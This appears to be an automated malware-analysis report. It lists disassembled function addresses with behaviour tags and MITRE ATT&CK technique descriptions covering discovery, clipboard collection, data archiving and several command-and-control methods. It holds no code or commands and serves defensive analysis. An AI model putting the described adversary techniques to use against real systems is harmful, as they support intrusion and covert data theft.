Function 1000372D, Relevance: 10.7, APIs: 7, Instructions: 237
fileCOMMON

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004032BF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 6FC516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00405E5E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Function 00405E8D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 6FC52921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00406A9B, Relevance: .3, Instructions: 334
COMMONCrypto

Function 00407272, Relevance: .3, Instructions: 300
COMMONCrypto

Function 1000775D, Relevance: .0, Instructions: 33
COMMON

Function 100074AD, Relevance: .0, Instructions: 10
COMMON

Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Function 6FC524D8, Relevance: 10.6, APIs: 7, Instructions: 124
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre